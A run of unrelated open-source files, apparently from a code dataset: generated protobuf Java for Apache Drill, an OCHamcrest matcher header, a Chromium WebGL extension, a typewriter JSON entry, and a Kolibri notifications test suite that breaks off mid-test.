private static final org.apache.drill.exec.proto.CoordinationProtos.Roles DEFAULT_INSTANCE;
static {
DEFAULT_INSTANCE = new org.apache.drill.exec.proto.CoordinationProtos.Roles();
}
public static org.apache.drill.exec.proto.CoordinationProtos.Roles getDefaultInstance() {
return DEFAULT_INSTANCE;
}
@java.lang.Deprecated public static final com.google.protobuf.Parser<Roles>
PARSER = new com.google.protobuf.AbstractParser<Roles>() {
@java.lang.Override
public Roles parsePartialFrom(
com.google.protobuf.CodedInputStream input,
com.google.protobuf.ExtensionRegistryLite extensionRegistry)
throws com.google.protobuf.InvalidProtocolBufferException {
return new Roles(input, extensionRegistry);
}
};
public static com.google.protobuf.Parser<Roles> parser() {
return PARSER;
}
@java.lang.Override
public com.google.protobuf.Parser<Roles> getParserForType() {
return PARSER;
}
@java.lang.Override
public org.apache.drill.exec.proto.CoordinationProtos.Roles getDefaultInstanceForType() {
return DEFAULT_INSTANCE;
}
}
private static final com.google.protobuf.Descriptors.Descriptor
internal_static_exec_DrillbitEndpoint_descriptor;
private static final
com.google.protobuf.GeneratedMessageV3.FieldAccessorTable
internal_static_exec_DrillbitEndpoint_fieldAccessorTable;
private static final com.google.protobuf.Descriptors.Descriptor
internal_static_exec_DrillServiceInstance_descriptor;
private static final
com.google.protobuf.GeneratedMessageV3.FieldAccessorTable
internal_static_exec_DrillServiceInstance_fieldAccessorTable;
private static final com.google.protobuf.Descriptors.Descriptor
internal_static_exec_Roles_descriptor;
private static final
com.google.protobuf.GeneratedMessageV3.FieldAccessorTable
internal_static_exec_Roles_fieldAccessorTable;
public static com.google.protobuf.Descriptors.FileDescriptor
getDescriptor() {
return descriptor;
}
private static com.google.protobuf.Descriptors.FileDescriptor
descriptor;
static {
java.lang.String[] descriptorData = {
"\n\022Coordination.proto\022\004exec\"\212\002\n\020DrillbitE" +
"ndpoint\022\017\n\007address\030\001 \001(\t\022\021\n\tuser_port\030\002 " +
"\001(\005\022\024\n\014control_port\030\003 \001(\005\022\021\n\tdata_port\030\004" +
" \001(\005\022\032\n\005roles\030\005 \001(\0132\013.exec.Roles\022\017\n\007vers" +
"ion\030\006 \001(\t\022+\n\005state\030\007 \001(\0162\034.exec.Drillbit" +
"Endpoint.State\022\021\n\thttp_port\030\010 \001(\005\"<\n\005Sta" +
"te\022\013\n\007STARTUP\020\000\022\n\n\006ONLINE\020\001\022\r\n\tQUIESCENT" +
"\020\002\022\013\n\007OFFLINE\020\003\"i\n\024DrillServiceInstance\022" +
"\n\n\002id\030\001 \001(\t\022\033\n\023registrationTimeUTC\030\002 \001(\003" +
"\022(\n\010endpoint\030\003 \001(\0132\026.exec.DrillbitEndpoi" +
"nt\"\227\001\n\005Roles\022\027\n\tsql_query\030\001 \001(\010:\004true\022\032\n" +
"\014logical_plan\030\002 \001(\010:\004true\022\033\n\rphysical_pl" +
"an\030\003 \001(\010:\004true\022\033\n\rjava_executor\030\004 \001(\010:\004t" +
"rue\022\037\n\021distributed_cache\030\005 \001(\010:\004trueB3\n\033" +
"org.apache.drill.exec.protoB\022Coordinatio" +
"nProtosH\001"
};
descriptor = com.google.protobuf.Descriptors.FileDescriptor
.internalBuildGeneratedFileFrom(descriptorData,
new com.google.protobuf.Descriptors.FileDescriptor[] {
});
internal_static_exec_DrillbitEndpoint_descriptor =
getDescriptor().getMessageTypes().get(0);
internal_static_exec_DrillbitEndpoint_fieldAccessorTable = new
com.google.protobuf.GeneratedMessageV3.FieldAccessorTable(
internal_static_exec_DrillbitEndpoint_descriptor,
new java.lang.String[] { "Address", "UserPort", "ControlPort", "DataPort", "Roles", "Version", "State", "HttpPort", });
internal_static_exec_DrillServiceInstance_descriptor =
getDescriptor().getMessageTypes().get(1);
internal_static_exec_DrillServiceInstance_fieldAccessorTable = new
com.google.protobuf.GeneratedMessageV3.FieldAccessorTable(
internal_static_exec_DrillServiceInstance_descriptor,
new java.lang.String[] { "Id", "RegistrationTimeUTC", "Endpoint", });
internal_static_exec_Roles_descriptor =
getDescriptor().getMessageTypes().get(2);
internal_static_exec_Roles_fieldAccessorTable = new
com.google.protobuf.GeneratedMessageV3.FieldAccessorTable(
internal_static_exec_Roles_descriptor,
new java.lang.String[] { "SqlQuery", "LogicalPlan", "PhysicalPlan", "JavaExecutor", "DistributedCache", });
}
// @@protoc_insertion_point(outer_class_scope)
}
| 53,769 |
3,970 |
// OCHamcrest by <NAME>, http://qualitycoding.org/about/
// Copyright 2014 hamcrest.org. See LICENSE.txt
#import <OCHamcrest/HCDiagnosingMatcher.h>
@interface HCAllOf : HCDiagnosingMatcher
+ (instancetype)allOf:(NSArray *)matchers;
- (instancetype)initWithMatchers:(NSArray *)matchers;
@end
FOUNDATION_EXPORT id HC_allOf(id match, ...) NS_REQUIRES_NIL_TERMINATION;
/**
allOf(firstMatcher, ...) -
Matches if all of the given matchers evaluate to @c YES.
@param firstMatcher,... A comma-separated list of matchers ending with @c nil.
The matchers are evaluated from left to right using short-circuit evaluation, so evaluation
stops as soon as a matcher returns @c NO.
Any argument that is not a matcher is implicitly wrapped in an @ref equalTo matcher to check for
equality.
(In the event of a name clash, don't \#define @c HC_SHORTHAND and use the synonym
@c HC_allOf instead.)
@ingroup logical_matchers
*/
#ifdef HC_SHORTHAND
#define allOf HC_allOf
#endif
| 331 |
2,151 |
<gh_stars>1000+
// Copyright 2014 The Chromium Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
#include "third_party/blink/renderer/modules/webgl/ext_srgb.h"
#include "third_party/blink/renderer/modules/webgl/webgl_rendering_context_base.h"
namespace blink {
EXTsRGB::EXTsRGB(WebGLRenderingContextBase* context) : WebGLExtension(context) {
context->ExtensionsUtil()->EnsureExtensionEnabled("GL_EXT_sRGB");
}
WebGLExtensionName EXTsRGB::GetName() const {
return kEXTsRGBName;
}
EXTsRGB* EXTsRGB::Create(WebGLRenderingContextBase* context) {
return new EXTsRGB(context);
}
bool EXTsRGB::Supported(WebGLRenderingContextBase* context) {
Extensions3DUtil* extensions_util = context->ExtensionsUtil();
return extensions_util->SupportsExtension("GL_EXT_sRGB");
}
const char* EXTsRGB::ExtensionName() {
return "EXT_sRGB";
}
} // namespace blink
| 324 |
310 |
<filename>gear/hardware/m/ms-25-plus.json
{
"name": "MS 25 Plus",
"description": "A typewriter.",
"url": "https://www.amazon.com/Olivetti-MS-25-Plus-Typewriter/dp/B00093IW12/"
}
| 78 |
545 |
<gh_stars>100-1000
import json
import uuid
from datetime import timedelta
from le_utils.constants import content_kinds
from mock import patch
from rest_framework.test import APITestCase
from kolibri.core.auth.test.helpers import create_superuser
from kolibri.core.auth.test.helpers import provision_device
from kolibri.core.auth.test.test_api import ClassroomFactory
from kolibri.core.auth.test.test_api import FacilityFactory
from kolibri.core.content.models import ContentNode
from kolibri.core.exams.models import Exam
from kolibri.core.exams.models import ExamAssignment
from kolibri.core.lessons.models import Lesson
from kolibri.core.lessons.models import LessonAssignment
from kolibri.core.logger.models import AttemptLog
from kolibri.core.logger.models import ExamAttemptLog
from kolibri.core.logger.models import ExamLog
from kolibri.core.logger.models import MasteryLog
from kolibri.core.logger.test.factory_logger import ContentSessionLogFactory
from kolibri.core.logger.test.factory_logger import ContentSummaryLogFactory
from kolibri.core.logger.test.factory_logger import FacilityUserFactory
from kolibri.core.logger.utils.exam_log_migration import migrate_from_exam_logs
from kolibri.core.notifications.api import _get_lesson_dict
from kolibri.core.notifications.api import batch_process_attemptlogs
from kolibri.core.notifications.api import batch_process_examlogs
from kolibri.core.notifications.api import batch_process_masterylogs_for_quizzes
from kolibri.core.notifications.api import batch_process_summarylogs
from kolibri.core.notifications.api import create_examlog
from kolibri.core.notifications.api import create_notification
from kolibri.core.notifications.api import create_summarylog
from kolibri.core.notifications.api import finish_lesson_resource
from kolibri.core.notifications.api import get_assignments
from kolibri.core.notifications.api import parse_attemptslog
from kolibri.core.notifications.api import parse_examlog
from kolibri.core.notifications.api import parse_summarylog
from kolibri.core.notifications.api import quiz_completed_notification
from kolibri.core.notifications.api import quiz_started_notification
from kolibri.core.notifications.api import start_lesson_assessment
from kolibri.core.notifications.api import start_lesson_resource
from kolibri.core.notifications.api import update_lesson_assessment
from kolibri.core.notifications.models import HelpReason
from kolibri.core.notifications.models import LearnerProgressNotification
from kolibri.core.notifications.models import NotificationEventType
from kolibri.core.notifications.models import NotificationObjectType
from kolibri.utils.time_utils import local_now
class NotificationsAPITestCase(APITestCase):
@classmethod
def setUpTestData(cls):
provision_device()
cls.facility = FacilityFactory.create()
cls.superuser = create_superuser(cls.facility)
def setUp(self):
_get_lesson_dict.cache_clear()
self.user1 = FacilityUserFactory.create(facility=self.facility)
self.user2 = FacilityUserFactory.create(facility=self.facility)
# create classroom, learner group, add user1
self.classroom = ClassroomFactory.create(parent=self.facility)
self.classroom.add_member(self.user1)
self.channel_id = "15f32edcec565396a1840c5413c92450"
self.lesson_id = "15f32edcec565396a1840c5413c92452"
self.content_ids = [
"15f32edcec565396a1840c5413c92451",
"15f32edcec565396a1840c5413c92452",
"15f32edcec565396a1840c5413c92453",
]
self.contentnode_ids = [
"25f32edcec565396a1840c5413c92451",
"25f32edcec565396a1840c5413c92452",
"25f32edcec565396a1840c5413c92453",
]
self.node_1 = ContentNode.objects.create(
title="Node 1",
available=True,
id=self.contentnode_ids[0],
content_id=self.content_ids[0],
channel_id=self.channel_id,
kind=content_kinds.EXERCISE,
)
self.node_2 = ContentNode.objects.create(
title="Node 2",
available=True,
id=self.contentnode_ids[1],
content_id=self.content_ids[1],
channel_id=self.channel_id,
kind=content_kinds.EXERCISE,
)
self.lesson = Lesson.objects.create(
id=self.lesson_id,
title="My Lesson",
is_active=True,
created_by=self.superuser,
collection=self.classroom,
resources=json.dumps(
[
{
"contentnode_id": self.node_1.id,
"content_id": self.node_1.content_id,
"channel_id": self.channel_id,
},
{
"contentnode_id": self.node_2.id,
"content_id": self.node_2.content_id,
"channel_id": self.channel_id,
},
]
),
)
self.assignment_1 = LessonAssignment.objects.create(
lesson=self.lesson, assigned_by=self.superuser, collection=self.classroom
)
self.exam = Exam.objects.create(
title="title",
question_count=1,
active=True,
collection=self.classroom,
creator=self.superuser,
)
self.assignment = ExamAssignment.objects.create(
exam=self.exam, collection=self.classroom, assigned_by=self.superuser
)
self.summarylog1 = ContentSummaryLogFactory.create(
user=self.user1,
content_id=self.node_1.content_id,
channel_id=self.channel_id,
)
self.summarylog2 = ContentSummaryLogFactory.create(
user=self.user1,
content_id=self.node_2.content_id,
channel_id=self.channel_id,
kind=content_kinds.EXERCISE,
)
def test_get_assignments(self):
# user2 has no classroom assigned, thus no lessons:
summarylog = ContentSummaryLogFactory.create(
user=self.user2,
content_id=self.node_1.content_id,
channel_id=self.channel_id,
)
lessons = get_assignments(self.user2, summarylog, attempt=False)
assert lessons == []
# user1 has one lesson:
lessons = get_assignments(self.user1, self.summarylog1, attempt=False)
assert len(lessons) > 0
assert type(lessons[0][0]) == dict
assert "assignment_collections" in lessons[0][0]
# being the node an Exercise, it should be available for attempts:
lessons = get_assignments(self.user1, self.summarylog1, attempt=True)
assert len(lessons) > 0
def test_create_notification(self):
notification = create_notification(
NotificationObjectType.Quiz,
NotificationEventType.Completed,
self.user1.id,
self.classroom.id,
)
assert str(notification) == "Quiz - Completed"
assert notification.user_id == self.user1.id
@patch("kolibri.core.notifications.api.save_notifications")
def test_parse_summarylog(self, save_notifications):
parse_summarylog(self.summarylog1)
assert save_notifications.called is False
self.summarylog1.progress = 1.0
parse_summarylog(self.summarylog1)
assert save_notifications.called
notification = save_notifications.call_args[0][0][0]
assert notification.notification_object == NotificationObjectType.Resource
assert notification.notification_event == NotificationEventType.Completed
assert notification.lesson_id == self.lesson.id
assert notification.contentnode_id == self.node_1.id
@patch("kolibri.core.notifications.api.save_notifications")
def test_finish_lesson_resource(self, save_notifications):
finish_lesson_resource(self.summarylog1, self.node_1.id, self.lesson.id)
assert save_notifications.called is False
self.summarylog1.progress = 1.0
self.summarylog1.save()
finish_lesson_resource(self.summarylog1, self.node_1.id, self.lesson.id)
assert save_notifications.called
notification = save_notifications.call_args[0][0][0]
assert notification.notification_object == NotificationObjectType.Resource
assert notification.notification_event == NotificationEventType.Completed
assert notification.lesson_id == self.lesson.id
assert notification.contentnode_id == self.node_1.id
@patch("kolibri.core.notifications.api.save_notifications")
def test_parse_summarylog_exercise(self, save_notifications):
parse_summarylog(self.summarylog2)
assert save_notifications.called is False
@patch("kolibri.core.notifications.api.save_notifications")
def test_create_summarylog(self, save_notifications):
create_summarylog(self.summarylog1)
assert save_notifications.called is True
notification = save_notifications.call_args[0][0][0]
assert notification.notification_object == NotificationObjectType.Resource
assert notification.notification_event == NotificationEventType.Started
@patch("kolibri.core.notifications.api.save_notifications")
def test_start_lesson_resource(self, save_notifications):
start_lesson_resource(self.summarylog1, self.node_1.id, self.lesson.id)
assert save_notifications.called is True
notification = save_notifications.call_args[0][0][0]
assert notification.notification_object == NotificationObjectType.Resource
assert notification.notification_event == NotificationEventType.Started
@patch("kolibri.core.notifications.api.save_notifications")
def test_parse_examlog(self, save_notifications):
examlog = ExamLog.objects.create(exam=self.exam, user=self.user1)
parse_examlog(examlog, local_now())
assert save_notifications.called is False
examlog.closed = True
parse_examlog(examlog, local_now())
assert save_notifications.called
notification = save_notifications.call_args[0][0][0]
assert notification.notification_object == NotificationObjectType.Quiz
assert notification.notification_event == NotificationEventType.Completed
@patch("kolibri.core.notifications.api.save_notifications")
def test_quiz_completed_notification(self, save_notifications):
summarylog_quiz = ContentSummaryLogFactory.create(
user=self.user1,
content_id=self.exam.id,
channel_id=None,
kind=content_kinds.QUIZ,
)
sessionlog_quiz = ContentSessionLogFactory.create(
user=self.user1,
content_id=self.exam.id,
channel_id=None,
kind=content_kinds.QUIZ,
)
masterylog_quiz = MasteryLog.objects.create(
summarylog=summarylog_quiz,
start_timestamp=local_now(),
user=self.user1,
mastery_level=-1,
)
AttemptLog.objects.create(
masterylog=masterylog_quiz,
sessionlog=sessionlog_quiz,
item="test",
start_timestamp=local_now(),
end_timestamp=local_now(),
user=self.user1,
correct=0,
)
quiz_completed_notification(masterylog_quiz, self.exam.id)
assert save_notifications.called is False
masterylog_quiz.complete = True
masterylog_quiz.save()
quiz_completed_notification(masterylog_quiz, self.exam.id)
assert save_notifications.called
notification = save_notifications.call_args[0][0][0]
assert notification.notification_object == NotificationObjectType.Quiz
assert notification.notification_event == NotificationEventType.Completed
assert notification.quiz_num_answered == 1
assert notification.quiz_num_correct == 0
@patch("kolibri.core.notifications.api.save_notifications")
def test_quiz_started_notification(self, save_notifications):
summarylog_quiz = ContentSummaryLogFactory.create(
user=self.user1,
content_id=self.exam.id,
channel_id=None,
kind=content_kinds.QUIZ,
)
ContentSessionLogFactory.create(
user=self.user1,
content_id=self.exam.id,
channel_id=None,
kind=content_kinds.QUIZ,
)
masterylog_quiz = MasteryLog.objects.create(
summarylog=summarylog_quiz,
start_timestamp=local_now(),
user=self.user1,
mastery_level=-1,
complete=True,
)
quiz_started_notification(masterylog_quiz, self.exam.id)
assert save_notifications.called
notification = save_notifications.call_args[0][0][0]
assert notification.notification_object == NotificationObjectType.Quiz
assert notification.notification_event == NotificationEventType.Started
@patch("kolibri.core.notifications.api.save_notifications")
def test_create_examlog(self, save_notifications):
examlog = ExamLog.objects.create(exam=self.exam, user=self.user1)
create_examlog(examlog, local_now())
assert save_notifications.called
notification = save_notifications.call_args[0][0][0]
assert notification.notification_object == NotificationObjectType.Quiz
assert notification.notification_event == NotificationEventType.Started
@patch("kolibri.core.notifications.api.create_notification")
@patch("kolibri.core.notifications.api.save_notifications")
def test_start_lesson_assessment_with_no_notification(
self, save_notifications, create_notification
):
log = ContentSessionLogFactory(
user=self.user1, content_id=uuid.uuid4().hex, channel_id=uuid.uuid4().hex
)
now = local_now()
masterylog = MasteryLog.objects.create(
summarylog=self.summarylog1,
user=self.user1,
start_timestamp=now,
mastery_level=1,
complete=True,
)
interactions = [{"type": "answer", "correct": 0} for _ in range(3)]
attemptlog1 = AttemptLog.objects.create(
masterylog=masterylog,
sessionlog=log,
user=self.user1,
start_timestamp=now,
end_timestamp=now,
time_spent=1.0,
complete=True,
correct=1,
hinted=False,
error=False,
interaction_history=[interactions[0]],
)
start_lesson_assessment(attemptlog1, self.node_1.id, self.lesson_id)
assert save_notifications.called
create_notification.assert_any_call(
NotificationObjectType.Resource,
NotificationEventType.Started,
attemptlog1.user_id,
self.classroom.id,
assignment_collections=[self.classroom.id],
lesson_id=self.lesson_id,
contentnode_id=self.node_1.id,
timestamp=attemptlog1.start_timestamp,
)
create_notification.assert_any_call(
NotificationObjectType.Lesson,
NotificationEventType.Started,
attemptlog1.user_id,
self.classroom.id,
assignment_collections=[self.classroom.id],
lesson_id=self.lesson_id,
timestamp=attemptlog1.start_timestamp,
)
@patch("kolibri.core.notifications.api.create_notification")
@patch("kolibri.core.notifications.api.save_notifications")
def test_parse_attemptslog_create_on_new_attempt_with_no_notification(
self, save_notifications, create_notification
):
log = ContentSessionLogFactory(
user=self.user1, content_id=uuid.uuid4().hex, channel_id=uuid.uuid4().hex
)
now = local_now()
masterylog = MasteryLog.objects.create(
summarylog=self.summarylog1,
user=self.user1,
start_timestamp=now,
mastery_level=1,
complete=True,
)
interactions = [{"type": "answer", "correct": 0} for _ in range(3)]
attemptlog1 = AttemptLog.objects.create(
masterylog=masterylog,
sessionlog=log,
user=self.user1,
start_timestamp=now,
end_timestamp=now,
time_spent=1.0,
complete=True,
correct=1,
hinted=False,
error=False,
interaction_history=[interactions[0]],
)
parse_attemptslog(attemptlog1)
assert save_notifications.called
create_notification.assert_any_call(
NotificationObjectType.Resource,
NotificationEventType.Started,
attemptlog1.user_id,
self.classroom.id,
assignment_collections=[self.classroom.id],
lesson_id=self.lesson_id,
contentnode_id=self.node_1.id,
timestamp=attemptlog1.start_timestamp,
)
create_notification.assert_any_call(
NotificationObjectType.Lesson,
NotificationEventType.Started,
attemptlog1.user_id,
self.classroom.id,
assignment_collections=[self.classroom.id],
lesson_id=self.lesson_id,
timestamp=attemptlog1.start_timestamp,
)
@patch("kolibri.core.notifications.api.create_notification")
@patch("kolibri.core.notifications.api.save_notifications")
def test_start_lesson_assessment_with_notification(
self, save_notifications, create_notification
):
log = ContentSessionLogFactory(
user=self.user1, content_id=uuid.uuid4().hex, channel_id=uuid.uuid4().hex
)
now = local_now()
masterylog = MasteryLog.objects.create(
summarylog=self.summarylog1,
user=self.user1,
start_timestamp=now,
mastery_level=1,
complete=True,
)
interactions = [{"type": "answer", "correct": 0} for _ in range(3)]
attemptlog1 = AttemptLog.objects.create(
masterylog=masterylog,
sessionlog=log,
user=self.user1,
start_timestamp=now,
end_timestamp=now,
time_spent=1.0,
complete=True,
correct=1,
hinted=False,
error=False,
interaction_history=[interactions[0]],
)
LearnerProgressNotification.objects.create(
notification_object=NotificationObjectType.Resource,
notification_event=NotificationEventType.Started,
user_id=attemptlog1.user_id,
classroom_id=self.classroom.id,
lesson_id=self.lesson_id,
contentnode_id=self.node_1.id,
timestamp=attemptlog1.start_timestamp,
)
LearnerProgressNotification.objects.create(
notification_object=NotificationObjectType.Lesson,
notification_event=NotificationEventType.Started,
user_id=attemptlog1.user_id,
classroom_id=self.classroom.id,
lesson_id=self.lesson_id,
timestamp=attemptlog1.start_timestamp,
)
attemptlog2 = AttemptLog.objects.create(
masterylog=masterylog,
sessionlog=log,
user=self.user1,
start_timestamp=now,
end_timestamp=now,
time_spent=1.0,
complete=True,
correct=1,
hinted=False,
error=False,
interaction_history=[interactions[0]],
)
start_lesson_assessment(attemptlog2, self.node_1.id, self.lesson_id)
assert create_notification.called is False
@patch("kolibri.core.notifications.api.create_notification")
@patch("kolibri.core.notifications.api.save_notifications")
def test_parse_attemptslog_create_on_new_attempt_with_notification(
self, save_notifications, create_notification
):
log = ContentSessionLogFactory(
user=self.user1, content_id=uuid.uuid4().hex, channel_id=uuid.uuid4().hex
)
now = local_now()
masterylog = MasteryLog.objects.create(
summarylog=self.summarylog1,
user=self.user1,
start_timestamp=now,
mastery_level=1,
complete=True,
)
interactions = [{"type": "answer", "correct": 0} for _ in range(3)]
attemptlog1 = AttemptLog.objects.create(
masterylog=masterylog,
sessionlog=log,
user=self.user1,
start_timestamp=now,
end_timestamp=now,
time_spent=1.0,
complete=True,
correct=1,
hinted=False,
error=False,
interaction_history=[interactions[0]],
)
LearnerProgressNotification.objects.create(
notification_object=NotificationObjectType.Resource,
notification_event=NotificationEventType.Started,
user_id=attemptlog1.user_id,
classroom_id=self.classroom.id,
lesson_id=self.lesson_id,
contentnode_id=self.node_1.id,
timestamp=attemptlog1.start_timestamp,
)
LearnerProgressNotification.objects.create(
notification_object=NotificationObjectType.Lesson,
notification_event=NotificationEventType.Started,
user_id=attemptlog1.user_id,
classroom_id=self.classroom.id,
lesson_id=self.lesson_id,
timestamp=attemptlog1.start_timestamp,
)
attemptlog2 = AttemptLog.objects.create(
masterylog=masterylog,
sessionlog=log,
user=self.user1,
start_timestamp=now,
end_timestamp=now,
time_spent=1.0,
complete=True,
correct=1,
hinted=False,
error=False,
interaction_history=[interactions[0]],
)
parse_attemptslog(attemptlog2)
assert save_notifications.called is False
assert create_notification.called is False
@patch("kolibri.core.notifications.api.create_notification")
@patch("kolibri.core.notifications.api.save_notifications")
def test_update_lesson_assessment_with_three_wrong_attempts(
self, save_notifications, create_notification
):
log = ContentSessionLogFactory(
user=self.user1, content_id=uuid.uuid4().hex, channel_id=uuid.uuid4().hex
)
now = local_now()
masterylog = MasteryLog.objects.create(
summarylog=self.summarylog1,
user=self.user1,
start_timestamp=now,
mastery_level=1,
complete=True,
)
interactions = [{"type": "answer", "correct": 0}]
AttemptLog.objects.create(
masterylog=masterylog,
sessionlog=log,
user=self.user1,
start_timestamp=now,
end_timestamp=now,
time_spent=1.0,
complete=True,
correct=0,
hinted=False,
error=False,
interaction_history=interactions,
)
AttemptLog.objects.create(
masterylog=masterylog,
sessionlog=log,
user=self.user1,
start_timestamp=now,
end_timestamp=now,
time_spent=1.0,
complete=True,
correct=0,
hinted=False,
error=False,
interaction_history=interactions,
)
# more than 3 attempts will trigger the help notification
interactions.append({"type": "answer", "correct": 0})
attemptlog3 = AttemptLog.objects.create(
masterylog=masterylog,
sessionlog=log,
user=self.user1,
start_timestamp=now,
end_timestamp=now,
time_spent=1.0,
complete=True,
correct=0,
hinted=False,
error=False,
interaction_history=interactions,
)
LearnerProgressNotification.objects.create(
notification_object=NotificationObjectType.Resource,
notification_event=NotificationEventType.Started,
user_id=attemptlog3.user_id,
classroom_id=self.classroom.id,
lesson_id=self.lesson_id,
contentnode_id=self.node_1.id,
timestamp=attemptlog3.start_timestamp,
)
LearnerProgressNotification.objects.create(
notification_object=NotificationObjectType.Lesson,
notification_event=NotificationEventType.Started,
user_id=attemptlog3.user_id,
classroom_id=self.classroom.id,
lesson_id=self.lesson_id,
timestamp=attemptlog3.start_timestamp,
)
update_lesson_assessment(attemptlog3, self.node_1.id, self.lesson_id)
assert save_notifications.called
create_notification.assert_any_call(
NotificationObjectType.Resource,
NotificationEventType.Help,
attemptlog3.user_id,
self.classroom.id,
assignment_collections=[self.classroom.id],
lesson_id=self.lesson_id,
contentnode_id=self.node_1.id,
reason=HelpReason.Multiple,
timestamp=attemptlog3.start_timestamp,
)
create_notification.assert_any_call(
NotificationObjectType.Resource,
NotificationEventType.Answered,
attemptlog3.user_id,
self.classroom.id,
assignment_collections=[self.classroom.id],
lesson_id=self.lesson_id,
contentnode_id=self.node_1.id,
timestamp=attemptlog3.start_timestamp,
)
@patch("kolibri.core.notifications.api.create_notification")
@patch("kolibri.core.notifications.api.save_notifications")
def test_parse_attemptslog_update_attempt_with_three_wrong_attempts(
self, save_notifications, create_notification
):
log = ContentSessionLogFactory(
user=self.user1, content_id=uuid.uuid4().hex, channel_id=uuid.uuid4().hex
)
now = local_now()
masterylog = MasteryLog.objects.create(
summarylog=self.summarylog1,
user=self.user1,
start_timestamp=now,
mastery_level=1,
complete=True,
)
interactions = [{"type": "answer", "correct": 0}]
AttemptLog.objects.create(
masterylog=masterylog,
sessionlog=log,
user=self.user1,
start_timestamp=now,
end_timestamp=now,
time_spent=1.0,
complete=True,
correct=0,
hinted=False,
error=False,
interaction_history=interactions,
)
AttemptLog.objects.create(
masterylog=masterylog,
sessionlog=log,
user=self.user1,
start_timestamp=now,
end_timestamp=now,
time_spent=1.0,
complete=True,
correct=0,
hinted=False,
error=False,
interaction_history=interactions,
)
# more than 3 attempts will trigger the help notification
interactions.append({"type": "answer", "correct": 0})
attemptlog3 = AttemptLog.objects.create(
masterylog=masterylog,
sessionlog=log,
user=self.user1,
start_timestamp=now,
end_timestamp=now,
time_spent=1.0,
complete=True,
correct=0,
hinted=False,
error=False,
interaction_history=interactions,
)
LearnerProgressNotification.objects.create(
notification_object=NotificationObjectType.Resource,
notification_event=NotificationEventType.Started,
user_id=attemptlog3.user_id,
classroom_id=self.classroom.id,
lesson_id=self.lesson_id,
contentnode_id=self.node_1.id,
timestamp=attemptlog3.start_timestamp,
)
LearnerProgressNotification.objects.create(
notification_object=NotificationObjectType.Lesson,
notification_event=NotificationEventType.Started,
user_id=attemptlog3.user_id,
classroom_id=self.classroom.id,
lesson_id=self.lesson_id,
timestamp=attemptlog3.start_timestamp,
)
parse_attemptslog(attemptlog3)
assert save_notifications.called
create_notification.assert_called_once_with(
NotificationObjectType.Resource,
NotificationEventType.Help,
attemptlog3.user_id,
self.classroom.id,
assignment_collections=[self.classroom.id],
lesson_id=self.lesson_id,
contentnode_id=self.node_1.id,
reason=HelpReason.Multiple,
timestamp=attemptlog3.start_timestamp,
)
@patch("kolibri.core.notifications.api.create_notification")
@patch("kolibri.core.notifications.api.save_notifications")
def test_update_lesson_assessment_with_three_wrong_attempts_on_same_attempt(
self, save_notifications, create_notification
):
log = ContentSessionLogFactory(
user=self.user1, content_id=uuid.uuid4().hex, channel_id=uuid.uuid4().hex
)
now = local_now()
masterylog = MasteryLog.objects.create(
summarylog=self.summarylog1,
user=self.user1,
start_timestamp=now,
mastery_level=1,
complete=True,
)
interactions = [{"type": "answer", "correct": 0} for _ in range(3)]
AttemptLog.objects.create(
masterylog=masterylog,
sessionlog=log,
user=self.user1,
start_timestamp=now,
end_timestamp=now,
time_spent=1.0,
complete=True,
correct=1,
hinted=False,
error=False,
interaction_history=[interactions[0]],
)
AttemptLog.objects.create(
masterylog=masterylog,
sessionlog=log,
user=self.user1,
start_timestamp=now,
end_timestamp=now,
time_spent=1.0,
complete=True,
correct=1,
hinted=False,
error=False,
interaction_history=[interactions[0]],
)
# more than 3 attempts will trigger the help notification
interactions.append({"type": "answer", "correct": 0})
attemptlog3 = AttemptLog.objects.create(
masterylog=masterylog,
sessionlog=log,
user=self.user1,
start_timestamp=now,
end_timestamp=now,
time_spent=1.0,
complete=True,
correct=1,
hinted=False,
error=False,
interaction_history=interactions,
)
LearnerProgressNotification.objects.create(
notification_object=NotificationObjectType.Resource,
notification_event=NotificationEventType.Started,
user_id=attemptlog3.user_id,
classroom_id=self.classroom.id,
lesson_id=self.lesson_id,
contentnode_id=self.node_1.id,
timestamp=attemptlog3.start_timestamp,
)
LearnerProgressNotification.objects.create(
notification_object=NotificationObjectType.Lesson,
notification_event=NotificationEventType.Started,
user_id=attemptlog3.user_id,
classroom_id=self.classroom.id,
lesson_id=self.lesson_id,
timestamp=attemptlog3.start_timestamp,
)
update_lesson_assessment(attemptlog3, self.node_1.id, self.lesson_id)
assert save_notifications.called
create_notification.assert_any_call(
NotificationObjectType.Resource,
NotificationEventType.Help,
attemptlog3.user_id,
self.classroom.id,
assignment_collections=[self.classroom.id],
lesson_id=self.lesson_id,
contentnode_id=self.node_1.id,
reason=HelpReason.Multiple,
timestamp=attemptlog3.start_timestamp,
)
create_notification.assert_any_call(
NotificationObjectType.Resource,
NotificationEventType.Answered,
attemptlog3.user_id,
self.classroom.id,
assignment_collections=[self.classroom.id],
lesson_id=self.lesson_id,
contentnode_id=self.node_1.id,
timestamp=attemptlog3.start_timestamp,
)
@patch("kolibri.core.notifications.api.create_notification")
@patch("kolibri.core.notifications.api.save_notifications")
def test_parse_attemptslog_update_attempt_with_three_wrong_attempts_on_same_attempt(
self, save_notifications, create_notification
):
log = ContentSessionLogFactory(
user=self.user1, content_id=uuid.uuid4().hex, channel_id=uuid.uuid4().hex
)
now = local_now()
masterylog = MasteryLog.objects.create(
summarylog=self.summarylog1,
user=self.user1,
start_timestamp=now,
mastery_level=1,
complete=True,
)
interactions = [{"type": "answer", "correct": 0} for _ in range(3)]
AttemptLog.objects.create(
masterylog=masterylog,
sessionlog=log,
user=self.user1,
start_timestamp=now,
end_timestamp=now,
time_spent=1.0,
complete=True,
correct=1,
hinted=False,
error=False,
interaction_history=[interactions[0]],
)
AttemptLog.objects.create(
masterylog=masterylog,
sessionlog=log,
user=self.user1,
start_timestamp=now,
end_timestamp=now,
time_spent=1.0,
complete=True,
correct=1,
hinted=False,
error=False,
interaction_history=[interactions[0]],
)
# more than 3 attempts will trigger the help notification
interactions.append({"type": "answer", "correct": 0})
attemptlog3 = AttemptLog.objects.create(
masterylog=masterylog,
sessionlog=log,
user=self.user1,
start_timestamp=now,
end_timestamp=now,
time_spent=1.0,
complete=True,
correct=1,
hinted=False,
error=False,
interaction_history=interactions,
)
LearnerProgressNotification.objects.create(
notification_object=NotificationObjectType.Resource,
notification_event=NotificationEventType.Started,
user_id=attemptlog3.user_id,
classroom_id=self.classroom.id,
lesson_id=self.lesson_id,
contentnode_id=self.node_1.id,
timestamp=attemptlog3.start_timestamp,
)
LearnerProgressNotification.objects.create(
notification_object=NotificationObjectType.Lesson,
notification_event=NotificationEventType.Started,
